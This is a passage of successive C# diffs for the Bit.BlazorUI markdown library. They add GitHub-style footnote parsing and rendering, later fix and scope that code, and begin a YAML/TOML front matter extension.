+        b.AddContent(2, figure.Caption);
+        b.CloseElement();
+        b.CloseElement();
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteAstProcessor.cs
@@ -1,0 +1,92 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Wires footnotes together once the whole document is parsed: every definition is lifted
+/// out of the flow into a single footnotes section at the end, numbered in order of first
+/// reference, and every reference is given its number and back-link occurrence. A reference
+/// with no definition degrades to the text it was written as, and a definition nobody cites
+/// is dropped.
+/// </summary>
+public sealed class BitMarkdownFootnoteAstProcessor : BitMarkdownAstProcessor
+{
+    // After the core reference resolver (0) and before the rest of the flavors.
+    public override int Order => 10;
+
+    public override void Process(BitMarkdownDocumentNode document, BitMarkdownPipeline pipeline)
+    {
+        var definitions = new Dictionary<string, BitMarkdownFootnoteDefinitionNode>(StringComparer.Ordinal);
+
+        BitMarkdownAstHelper.VisitChildLists(document, list =>
+        {
+            // Collected in document order so the first definition of a label wins (matching
+            // how link references behave), then removed back to front.
+            for (int i = 0; i < list.Count; i++)
+            {
+                if (list[i] is BitMarkdownFootnoteDefinitionNode definition)
+                    definitions.TryAdd(definition.Label, definition);
+            }
+
+            for (int i = list.Count - 1; i >= 0; i--)
+            {
+                if (list[i] is BitMarkdownFootnoteDefinitionNode) list.RemoveAt(i);
+            }
+        });
+
+        if (definitions.Count > 0)
+        {
+            var section = new BitMarkdownFootnotesNode();
+            // The section joins the document before numbering so that a footnote citing
+            // another footnote is picked up by the same sweep that numbered the first.
+            document.Children.Add(section);
+
+            bool discovered;
+            do
+            {
+                discovered = false;
+                foreach (var reference in BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownFootnoteReferenceNode>().ToList())
+                {
+                    if (reference.Number != 0) continue;
+                    if (definitions.TryGetValue(reference.Label, out var definition) is false) continue;
+
+                    if (definition.Number == 0)
+                    {
+                        // Numbering follows the order references appear, which is what
+                        // readers expect from the printed markers.
+                        definition.Number = section.Children.Count + 1;
+                        section.Children.Add(definition);
+                        discovered = true;
+                    }
+
+                    definition.ReferenceCount++;
+                    reference.Number = definition.Number;
+                    reference.Occurrence = definition.ReferenceCount;
+                }
+            }
+            while (discovered);
+
+            // A document whose only footnote syntax was an uncited definition gets no section.
+            if (section.Children.Count == 0)
+            {
+                document.Children.Remove(section);
+            }
+        }
+
+        DropUnresolvedReferences(document, definitions);
+    }
+
+    // A "[^x]" that never resolved (its definition was dropped, or the pre-scan matched a
+    // "[^x]:" line inside a code block) reads as the plain text it was written as.
+    private static void DropUnresolvedReferences(
+        BitMarkdownDocumentNode document, Dictionary<string, BitMarkdownFootnoteDefinitionNode> definitions)
+    {
+        BitMarkdownAstHelper.VisitChildLists(document, list =>
+        {
+            for (int i = 0; i < list.Count; i++)
+            {
+                if (list[i] is not BitMarkdownFootnoteReferenceNode reference) continue;
+                if (reference.Number > 0 && definitions.ContainsKey(reference.Label)) continue;
+                list[i] = new BitMarkdownTextNode(reference.RawText);
+            }
+        });
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteDefinitionParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteDefinitionParser.cs
@@ -26,7 +26,12 @@ public sealed class BitMarkdownFootnoteDefinitionParser : BitMarkdownBlockParser
         if (labelEnd < 0) return false;
         if (labelEnd + 1 >= line.Length || line[labelEnd + 1] != ':') return false;
 
-        string label = BitMarkdownLinkHelpers.NormalizeLabel(line.Substring(p + 1, labelEnd - p - 1));
+        // The length limit is on the label as written, so whitespace a normalized label
+        // collapses away cannot smuggle an over-long one through.
+        string raw = line.Substring(p + 1, labelEnd - p - 1);
+        if (raw.Length > BitMarkdownLinkHelpers.MaxLabelLength) return false;
+
+        string label = BitMarkdownLinkHelpers.NormalizeLabel(raw);
         // "^" alone is not a label.
         if (label.Length <= 1 || label.Length > BitMarkdownLinkHelpers.MaxLabelLength) return false;
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteDefinitionParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteDefinitionParser.cs
@@ -1,0 +1,66 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Parses GitHub-style footnote definitions: <c>[^label]: the note</c>, optionally continued
+/// on following lines indented to line up under the note's text.
+/// </summary>
+public sealed class BitMarkdownFootnoteDefinitionParser : BitMarkdownBlockParser
+{
+    // Claims its lines before the link reference definition parser (5), which would
+    // otherwise read "[^1]: ..." as an ordinary reference definition.
+    public override int Order => 4;
+
+    public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
+    {
+        var lines = state.Lines;
+        int i = state.Line;
+        string line = lines[i];
+
+        if (BitMarkdownBlockProcessor.GetIndent(line) >= 4) return false;
+
+        int p = 0;
+        while (p < line.Length && line[p] == ' ') p++;
+        if (p + 1 >= line.Length || line[p] != '[' || line[p + 1] != '^') return false;
+
+        int labelEnd = BitMarkdownLinkHelpers.FindLabelEnd(line, p);
+        if (labelEnd < 0) return false;
+        if (labelEnd + 1 >= line.Length || line[labelEnd + 1] != ':') return false;
+
+        string label = BitMarkdownLinkHelpers.NormalizeLabel(line.Substring(p + 1, labelEnd - p - 1));
+        // "^" alone is not a label.
+        if (label.Length <= 1 || label.Length > BitMarkdownLinkHelpers.MaxLabelLength) return false;
+
+        var content = new List<string> { line[(labelEnd + 2)..].TrimStart(' ', '\t') };
+        i++;
+
+        // Continuation lines belong to the note while they are indented (or blank and
+        // followed by an indented line), mirroring how a list item is continued.
+        while (i < lines.Count)
+        {
+            string next = lines[i];
+            if (BitMarkdownBlockProcessor.IsBlank(next))
+            {
+                int j = i + 1;
+                while (j < lines.Count && BitMarkdownBlockProcessor.IsBlank(lines[j])) j++;
+                if (j < lines.Count && BitMarkdownBlockProcessor.GetIndent(lines[j]) >= 4)
+                {
+                    content.Add(string.Empty);
+                    i++;
+                    continue;
+                }
+                break;
+            }
+
+            if (BitMarkdownBlockProcessor.GetIndent(next) < 4) break;
+
+            content.Add(BitMarkdownBlockProcessor.StripIndent(next, 4));
+            i++;
+        }
+
+        var definition = new BitMarkdownFootnoteDefinitionNode { Label = label };
+        definition.Children.AddRange(state.ParseBlocks(content));
+        output.Add(definition);
+        state.Line = i;
+        return true;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteDefinitionParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteDefinitionParser.cs
@@ -10,32 +10,22 @@ public sealed class BitMarkdownFootnoteDefinitionParser : BitMarkdownBlockParser
     // otherwise read "[^1]: ..." as an ordinary reference definition.
     public override int Order => 4;
 
+    // A definition ends the paragraph above it. Unlike a link reference definition - which
+    // CommonMark says may not, and which produces nothing a reader would miss - this one carries
+    // the note's whole text, so being absorbed into the paragraph loses both the note and, with the
+    // label undefined, the reference that cited it.
+    public override bool CanInterruptParagraph(BitMarkdownBlockProcessor state, int lineIndex)
+        => TryReadLabel(state.Lines[lineIndex], out _, out _);
+
     public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
     {
         var lines = state.Lines;
         int i = state.Line;
         string line = lines[i];
 
-        if (BitMarkdownBlockProcessor.GetIndent(line) >= 4) return false;
+        if (TryReadLabel(line, out string label, out int contentStart) is false) return false;
 
-        int p = 0;
-        while (p < line.Length && line[p] == ' ') p++;
-        if (p + 1 >= line.Length || line[p] != '[' || line[p + 1] != '^') return false;
-
-        int labelEnd = BitMarkdownLinkHelpers.FindLabelEnd(line, p);
-        if (labelEnd < 0) return false;
-        if (labelEnd + 1 >= line.Length || line[labelEnd + 1] != ':') return false;
-
-        // The length limit is on the label as written, so whitespace a normalized label
-        // collapses away cannot smuggle an over-long one through.
-        string raw = line.Substring(p + 1, labelEnd - p - 1);
-        if (raw.Length > BitMarkdownLinkHelpers.MaxLabelLength) return false;
-
-        string label = BitMarkdownLinkHelpers.NormalizeLabel(raw);
-        // "^" alone is not a label.
-        if (label.Length <= 1 || label.Length > BitMarkdownLinkHelpers.MaxLabelLength) return false;
-
-        var content = new List<string> { line[(labelEnd + 2)..].TrimStart(' ', '\t') };
+        var content = new List<string> { line[contentStart..].TrimStart(' ', '\t') };
         i++;
 
         // Continuation lines belong to the note while they are indented (or blank and
@@ -63,9 +53,43 @@ public sealed class BitMarkdownFootnoteDefinitionParser : BitMarkdownBlockParser
         }
 
         var definition = new BitMarkdownFootnoteDefinitionNode { Label = label };
-        definition.Children.AddRange(state.ParseBlocks(content));
+        // The note's first line is the remainder of the definition line and every continuation
+        // line was taken one for one from there on, so the content maps onto the document's lines.
+        definition.Children.AddRange(state.ParseBlocks(content, state.Line));
         output.Add(definition);
         state.Line = i;
+        return true;
+    }
+
+    // Reads the "[^label]:" opening a definition, returning the normalized label and the index its
+    // text starts at. One reader for both the acceptance test and the parse, so the line that ends
+    // a paragraph and the line that becomes a definition cannot come apart.
+    private static bool TryReadLabel(string line, out string label, out int contentStart)
+    {
+        label = string.Empty;
+        contentStart = 0;
+
+        if (BitMarkdownBlockProcessor.GetIndent(line) >= 4) return false;
+
+        int p = 0;
+        while (p < line.Length && line[p] == ' ') p++;
+        if (p + 1 >= line.Length || line[p] != '[' || line[p + 1] != '^') return false;
+
+        int labelEnd = BitMarkdownLinkHelpers.FindLabelEnd(line, p);
+        if (labelEnd < 0) return false;
+        if (labelEnd + 1 >= line.Length || line[labelEnd + 1] != ':') return false;
+
+        // The length limit is on the label as written, so whitespace a normalized label
+        // collapses away cannot smuggle an over-long one through.
+        string raw = line.Substring(p + 1, labelEnd - p - 1);
+        if (raw.Length > BitMarkdownLinkHelpers.MaxLabelLength) return false;
+
+        string normalized = BitMarkdownLinkHelpers.NormalizeLabel(raw);
+        // "^" alone is not a label.
+        if (normalized.Length <= 1 || normalized.Length > BitMarkdownLinkHelpers.MaxLabelLength) return false;
+
+        label = normalized;
+        contentStart = labelEnd + 2;
         return true;
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteExtension.cs
@@ -1,0 +1,17 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Enables GitHub-style footnotes: a <c>[^label]</c> reference in the text and a
+/// <c>[^label]: the note</c> definition anywhere in the document, collected into a numbered
+/// footnotes section at the end with back-links to every citation.
+/// </summary>
+public sealed class BitMarkdownFootnoteExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+    {
+        builder.BlockParsers.Add(new BitMarkdownFootnoteDefinitionParser());
+        builder.InlineParsers.Add(new BitMarkdownFootnoteInlineParser());
+        builder.AstProcessors.Add(new BitMarkdownFootnoteAstProcessor());
+        builder.Renderers.Add(new BitMarkdownFootnoteRenderer());
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteInlineParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteInlineParser.cs
@@ -1,0 +1,41 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Handles footnote references (<c>[^label]</c>). Only a label the document actually defines
+/// becomes a reference; anything else stays the text it was written as.
+/// </summary>
+public sealed class BitMarkdownFootnoteInlineParser : BitMarkdownInlineParser
+{
+    public override char[] TriggerChars => new[] { '[' };
+
+    // Offered the '[' before the link parser, whose label syntax "[^1]" also matches.
+    public override int Order => 10;
+
+    public override bool TryParse(BitMarkdownInlineProcessor state)
+    {
+        string s = state.Text;
+        int i = state.Pos;
+        if (i + 1 >= s.Length || s[i] != '[' || s[i + 1] != '^') return false;
+
+        int labelEnd = BitMarkdownLinkHelpers.FindLabelEnd(s, i);
+        if (labelEnd < 0) return false;
+
+        string label = BitMarkdownLinkHelpers.NormalizeLabel(s.Substring(i + 1, labelEnd - i - 1));
+        if (label.Length <= 1 || label.Length > BitMarkdownLinkHelpers.MaxLabelLength) return false;
+
+        // A reference is only meaningful when a "[^label]:" definition exists; the pre-scan
+        // knows every one of them, including those written after this point.
+        if (state.HasReferenceLabel(label) is false) return false;
+
+        // "[^1]:" at this position is the definition itself, not a reference to it.
+        if (labelEnd + 1 < s.Length && s[labelEnd + 1] == ':') return false;
+
+        state.AppendNode(new BitMarkdownFootnoteReferenceNode
+        {
+            Label = label,
+            RawText = s[i..(labelEnd + 1)]
+        });
+        state.Pos = labelEnd + 1;
+        return true;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteInlineParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteInlineParser.cs
@@ -27,8 +27,12 @@ public sealed class BitMarkdownFootnoteInlineParser : BitMarkdownInlineParser
         // knows every one of them, including those written after this point.
         if (state.HasReferenceLabel(label) is false) return false;
 
-        // "[^1]:" at this position is the definition itself, not a reference to it.
-        if (labelEnd + 1 < s.Length && s[labelEnd + 1] == ':') return false;
+        // "[^1]:" at the start of a line is the definition itself, not a reference to it. Only
+        // there: a citation that happens to be followed by a colon - "as noted[^1]: see below" -
+        // is a reference like any other, and rejecting it dropped both the citation and, since
+        // nothing then cited the label, the note it pointed at.
+        bool atLineStart = i == 0 || s[i - 1] == '\n';
+        if (atLineStart && labelEnd + 1 < s.Length && s[labelEnd + 1] == ':') return false;
 
         state.AppendNode(new BitMarkdownFootnoteReferenceNode
         {

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteNodes.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteNodes.cs
@@ -1,0 +1,56 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// A footnote definition (<c>[^label]: text</c>). The definition is written wherever the
+/// author likes; <see cref="BitMarkdownFootnoteAstProcessor"/> lifts every one of them into
+/// a single <see cref="BitMarkdownFootnotesNode"/> at the end of the document.
+/// </summary>
+public sealed class BitMarkdownFootnoteDefinitionNode : BitMarkdownNode
+{
+    /// <summary>The normalized label the references use to find this definition.</summary>
+    public string Label { get; init; } = string.Empty;
+
+    /// <summary>The 1-based number printed for this footnote, assigned in order of first reference.</summary>
+    public int Number { get; set; }
+
+    /// <summary>How many references point at this footnote, which is how many back-links it gets.</summary>
+    public int ReferenceCount { get; set; }
+
+    /// <summary>The blocks making up the footnote's content.</summary>
+    public List<BitMarkdownNode> Children { get; } = new();
+
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}
+
+/// <summary>
+/// A footnote reference (<c>[^label]</c>), rendered as a superscript link down to the
+/// footnote's entry.
+/// </summary>
+public sealed class BitMarkdownFootnoteReferenceNode : BitMarkdownNode
+{
+    /// <summary>The normalized label this reference points at.</summary>
+    public string Label { get; init; } = string.Empty;
+
+    /// <summary>
+    /// The reference exactly as it was written, used to put the source text back when no
+    /// definition matches.
+    /// </summary>
+    public string RawText { get; init; } = string.Empty;
+
+    /// <summary>The footnote's number, assigned by the AST processor.</summary>
+    public int Number { get; set; }
+
+    /// <summary>Which occurrence of this label this is, so each back-link has a unique target.</summary>
+    public int Occurrence { get; set; } = 1;
+}
+
+/// <summary>
+/// The footnotes section appended to the end of a document that uses footnotes. It holds
+/// the referenced <see cref="BitMarkdownFootnoteDefinitionNode"/>s in reference order.
+/// </summary>
+public sealed class BitMarkdownFootnotesNode : BitMarkdownNode
+{
+    public List<BitMarkdownNode> Children { get; } = new();
+
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteNodes.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteNodes.cs
@@ -16,6 +16,13 @@ public sealed class BitMarkdownFootnoteDefinitionNode : BitMarkdownNode
     /// <summary>How many references point at this footnote, which is how many back-links it gets.</summary>
     public int ReferenceCount { get; set; }
 
+    /// <summary>
+    /// The prefix the rendered ids are given, so two viewers showing footnotes on the same page
+    /// do not emit the same ids. Set by the viewer from its own unique id; empty when the
+    /// document is rendered by something that does not scope its ids.
+    /// </summary>
+    public string? IdScope { get; set; }
+
     /// <summary>The blocks making up the footnote's content.</summary>
     public List<BitMarkdownNode> Children { get; } = new();
 
@@ -42,6 +49,13 @@ public sealed class BitMarkdownFootnoteReferenceNode : BitMarkdownNode
 
     /// <summary>Which occurrence of this label this is, so each back-link has a unique target.</summary>
     public int Occurrence { get; set; } = 1;
+
+    /// <summary>
+    /// The prefix the rendered ids are given, so two viewers showing footnotes on the same page
+    /// do not emit the same ids. Set by the viewer from its own unique id; empty when the
+    /// document is rendered by something that does not scope its ids.
+    /// </summary>
+    public string? IdScope { get; set; }
 }
 
 /// <summary>
@@ -50,6 +64,13 @@ public sealed class BitMarkdownFootnoteReferenceNode : BitMarkdownNode
 /// </summary>
 public sealed class BitMarkdownFootnotesNode : BitMarkdownNode
 {
+    /// <summary>
+    /// The prefix the rendered ids are given, so two viewers showing footnotes on the same page
+    /// do not emit the same ids. Set by the viewer from its own unique id; empty when the
+    /// document is rendered by something that does not scope its ids.
+    /// </summary>
+    public string? IdScope { get; set; }
+
     public List<BitMarkdownNode> Children { get; } = new();
 
     public override IList<BitMarkdownNode> ChildNodes => Children;

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteRenderer.cs
@@ -18,12 +18,13 @@ public sealed class BitMarkdownFootnoteRenderer : BitMarkdownNodeRenderer
         switch (node)
         {
             case BitMarkdownFootnoteReferenceNode reference:
+                string referenceScope = Scope(reference.IdScope);
                 b.OpenElement(0, "sup");
                 b.AddAttribute(1, "class", "footnote-ref");
                 b.OpenElement(2, "a");
-                b.AddAttribute(3, "href", $"#fn-{reference.Number}");
+                b.AddAttribute(3, "href", $"#{referenceScope}fn-{reference.Number}");
                 b.AddAttribute(4, "id", FootnoteRefId(reference));
-                b.AddAttribute(5, "aria-describedby", "footnotes");
+                b.AddAttribute(5, "aria-describedby", $"{referenceScope}footnotes");
                 b.AddContent(6, reference.Number.ToString());
                 b.CloseElement();
                 b.CloseElement();
@@ -32,7 +33,7 @@ public sealed class BitMarkdownFootnoteRenderer : BitMarkdownNodeRenderer
             case BitMarkdownFootnotesNode footnotes:
                 b.OpenElement(7, "section");
                 b.AddAttribute(8, "class", "footnotes");
-                b.AddAttribute(9, "id", "footnotes");
+                b.AddAttribute(9, "id", $"{Scope(footnotes.IdScope)}footnotes");
                 b.AddAttribute(10, "aria-label", r.Texts.Footnotes);
                 b.OpenElement(11, "hr");
                 b.CloseElement();
@@ -44,7 +45,7 @@ public sealed class BitMarkdownFootnoteRenderer : BitMarkdownNodeRenderer
 
             case BitMarkdownFootnoteDefinitionNode definition:
                 b.OpenElement(13, "li");
-                b.AddAttribute(14, "id", $"fn-{definition.Number}");
+                b.AddAttribute(14, "id", $"{Scope(definition.IdScope)}fn-{definition.Number}");
                 b.AddAttribute(15, "class", "footnote-item");
                 r.WriteNodes(b, definition.Children);
                 // One back-link per reference, so a note cited several times can return to
@@ -53,7 +54,7 @@ public sealed class BitMarkdownFootnoteRenderer : BitMarkdownNodeRenderer
                 {
                     b.AddContent(16, " ");
                     b.OpenElement(17, "a");
-                    b.AddAttribute(18, "href", $"#fnref-{definition.Number}{(i > 1 ? "-" + i : string.Empty)}");
+                    b.AddAttribute(18, "href", $"#{Scope(definition.IdScope)}fnref-{definition.Number}{(i > 1 ? "-" + i : string.Empty)}");
                     b.AddAttribute(19, "class", "footnote-backref");
                     b.AddAttribute(20, "aria-label", definition.ReferenceCount > 1
                         ? string.Format(CultureInfo.CurrentCulture, r.Texts.FootnoteBackReferenceOccurrence, definition.Number, i)
@@ -68,6 +69,11 @@ public sealed class BitMarkdownFootnoteRenderer : BitMarkdownNodeRenderer
 
     private static string FootnoteRefId(BitMarkdownFootnoteReferenceNode reference)
         => reference.Occurrence > 1
-            ? $"fnref-{reference.Number}-{reference.Occurrence}"
-            : $"fnref-{reference.Number}";
+            ? $"{Scope(reference.IdScope)}fnref-{reference.Number}-{reference.Occurrence}"
+            : $"{Scope(reference.IdScope)}fnref-{reference.Number}";
+
+    // Every id the section emits carries the host viewer's own prefix, so two viewers on one
+    // page keep their links pointing at their own notes instead of at each other's.
+    private static string Scope(string? idScope)
+        => string.IsNullOrEmpty(idScope) ? string.Empty : idScope + "-";
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteRenderer.cs
@@ -1,3 +1,4 @@
+using System.Globalization;
 using Microsoft.AspNetCore.Components.Rendering;
 
 namespace Bit.BlazorUI;
@@ -32,7 +33,7 @@ public sealed class BitMarkdownFootnoteRenderer : BitMarkdownNodeRenderer
                 b.OpenElement(7, "section");
                 b.AddAttribute(8, "class", "footnotes");
                 b.AddAttribute(9, "id", "footnotes");
-                b.AddAttribute(10, "aria-label", "Footnotes");
+                b.AddAttribute(10, "aria-label", r.Texts.Footnotes);
                 b.OpenElement(11, "hr");
                 b.CloseElement();
                 b.OpenElement(12, "ol");
@@ -55,8 +56,8 @@ public sealed class BitMarkdownFootnoteRenderer : BitMarkdownNodeRenderer
                     b.AddAttribute(18, "href", $"#fnref-{definition.Number}{(i > 1 ? "-" + i : string.Empty)}");
                     b.AddAttribute(19, "class", "footnote-backref");
                     b.AddAttribute(20, "aria-label", definition.ReferenceCount > 1
-                        ? $"Back to reference {definition.Number}-{i}"
-                        : $"Back to reference {definition.Number}");
+                        ? string.Format(CultureInfo.CurrentCulture, r.Texts.FootnoteBackReferenceOccurrence, definition.Number, i)
+                        : string.Format(CultureInfo.CurrentCulture, r.Texts.FootnoteBackReference, definition.Number));
                     b.AddContent(21, i > 1 ? $"↩︎{i}" : "↩︎");
                     b.CloseElement();
                 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFootnoteRenderer.cs
@@ -1,0 +1,72 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Renders footnote references, the footnotes section and its entries, using the markup
+/// GitHub emits so the same stylesheet rules apply.
+/// </summary>
+public sealed class BitMarkdownFootnoteRenderer : BitMarkdownNodeRenderer
+{
+    public override bool Accept(BitMarkdownNode node) => node is
+        BitMarkdownFootnoteReferenceNode or BitMarkdownFootnotesNode or BitMarkdownFootnoteDefinitionNode;
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
+    {
+        switch (node)
+        {
+            case BitMarkdownFootnoteReferenceNode reference:
+                b.OpenElement(0, "sup");
+                b.AddAttribute(1, "class", "footnote-ref");
+                b.OpenElement(2, "a");
+                b.AddAttribute(3, "href", $"#fn-{reference.Number}");
+                b.AddAttribute(4, "id", FootnoteRefId(reference));
+                b.AddAttribute(5, "aria-describedby", "footnotes");
+                b.AddContent(6, reference.Number.ToString());
+                b.CloseElement();
+                b.CloseElement();
+                break;
+
+            case BitMarkdownFootnotesNode footnotes:
+                b.OpenElement(7, "section");
+                b.AddAttribute(8, "class", "footnotes");
+                b.AddAttribute(9, "id", "footnotes");
+                b.AddAttribute(10, "aria-label", "Footnotes");
+                b.OpenElement(11, "hr");
+                b.CloseElement();
+                b.OpenElement(12, "ol");
+                r.WriteNodes(b, footnotes.Children);
+                b.CloseElement();
+                b.CloseElement();
+                break;
+
+            case BitMarkdownFootnoteDefinitionNode definition:
+                b.OpenElement(13, "li");
+                b.AddAttribute(14, "id", $"fn-{definition.Number}");
+                b.AddAttribute(15, "class", "footnote-item");
+                r.WriteNodes(b, definition.Children);
+                // One back-link per reference, so a note cited several times can return to
+                // each of them.
+                for (int i = 1; i <= definition.ReferenceCount; i++)
+                {
+                    b.AddContent(16, " ");
+                    b.OpenElement(17, "a");
+                    b.AddAttribute(18, "href", $"#fnref-{definition.Number}{(i > 1 ? "-" + i : string.Empty)}");
+                    b.AddAttribute(19, "class", "footnote-backref");
+                    b.AddAttribute(20, "aria-label", definition.ReferenceCount > 1
+                        ? $"Back to reference {definition.Number}-{i}"
+                        : $"Back to reference {definition.Number}");
+                    b.AddContent(21, i > 1 ? $"↩︎{i}" : "↩︎");
+                    b.CloseElement();
+                }
+                b.CloseElement();
+                break;
+        }
+    }
+
+    private static string FootnoteRefId(BitMarkdownFootnoteReferenceNode reference)
+        => reference.Occurrence > 1
+            ? $"fnref-{reference.Number}-{reference.Occurrence}"
+            : $"fnref-{reference.Number}";
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFrontMatterBlockParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFrontMatterBlockParser.cs
@@ -1,0 +1,74 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Parses the metadata block a document may open with: <c>---</c> (YAML) or <c>+++</c> (TOML) on
+/// the very first line, the metadata, then a matching closing fence.
+/// </summary>
+public sealed class BitMarkdownFrontMatterBlockParser : BitMarkdownBlockParser
+{
+    // Ahead of every other parser: the opening fence is also a valid thematic break, and the
+    // metadata under it is also a valid setext heading.
+    public override int Order => -100;
+
+    public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
+    {
+        // Front matter is only front matter at the very top of the document, never inside a
+        // list item, a block quote, or after any other content.
+        if (state.Line != 0 || state.IsTopLevel is false) return false;
+
+        var lines = state.Lines;
+        string fence = ReadFence(lines[0]);
+        if (fence.Length == 0) return false;
+
+        int end = -1;
+        for (int i = 1; i < lines.Count; i++)
+        {
+            if (IsClosingFence(lines[i], fence[0])) { end = i; break; }
+        }
+
+        // An unterminated block is not front matter; leaving it unmatched keeps the document
+        // rendering exactly as it did before the extension was enabled.
+        if (end < 0) return false;
+
+        output.Add(new BitMarkdownFrontMatterNode
+        {
+            Fence = fence,
+            Text = string.Join("\n", lines.Take(end).Skip(1))
+        });
+        state.Line = end + 1;
+        return true;
+    }
+
+    // The opening fence must be a run of at least three '-' or '+' alone on the line.
+    private static string ReadFence(string line)
+    {
+        string trimmed = line.TrimEnd(' ', '\t');
+        if (trimmed.Length < 3) return string.Empty;
+
+        char c = trimmed[0];
+        if (c is not ('-' or '+')) return string.Empty;
+
+        foreach (char ch in trimmed)
+        {
+            if (ch != c) return string.Empty;
+        }
+        return trimmed;
+    }
+
+    // YAML also allows "..." to end the document, which is what a generator emits when the
+    // metadata is followed by more YAML documents.
+    private static bool IsClosingFence(string line, char fenceChar)
+    {
+        string trimmed = line.TrimEnd(' ', '\t');
+        if (trimmed.Length < 3) return false;
+
+        char c = trimmed[0];
+        if (c != fenceChar && !(fenceChar == '-' && c == '.')) return false;
+
+        foreach (char ch in trimmed)
+        {
+            if (ch != c) return false;
+        }
+        return true;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFrontMatterExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFrontMatterExtension.cs
@@ -1,0 +1,15 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Enables YAML (<c>---</c>) and TOML (<c>+++</c>) front matter: a metadata block at the very top
+/// of the document is parsed into a <see cref="BitMarkdownFrontMatterNode"/> and rendered as
+/// nothing, instead of showing up as a thematic break followed by a heading.
+/// </summary>
+public sealed class BitMarkdownFrontMatterExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+    {
+        builder.BlockParsers.Add(new BitMarkdownFrontMatterBlockParser());
+        builder.Renderers.Add(new BitMarkdownFrontMatterRenderer());
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFrontMatterNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFrontMatterNode.cs
@@ -1,0 +1,36 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// The metadata block a document may open with: a run of lines fenced by <c>---</c> (YAML) or
+/// <c>+++</c> (TOML). It carries information about the document rather than content of it, so it
+/// renders nothing; the raw text is kept here for the host to read and parse with whatever
+/// serializer it already uses.
+/// </summary>
+/// <remarks>
+/// Without the front matter extension enabled, a leading <c>---</c> is ordinary Markdown: the
+/// first line becomes a thematic break and the metadata lines become a setext heading, which is
+/// how a real <c>.md</c> file from a static-site generator renders as garbage. Enabling the
+/// extension is what makes those files render as their authors meant them to.
+/// </remarks>
+public sealed class BitMarkdownFrontMatterNode : BitMarkdownNode
+{
+    /// <summary>The fence that opened the block, either <c>---</c> or <c>+++</c>.</summary>
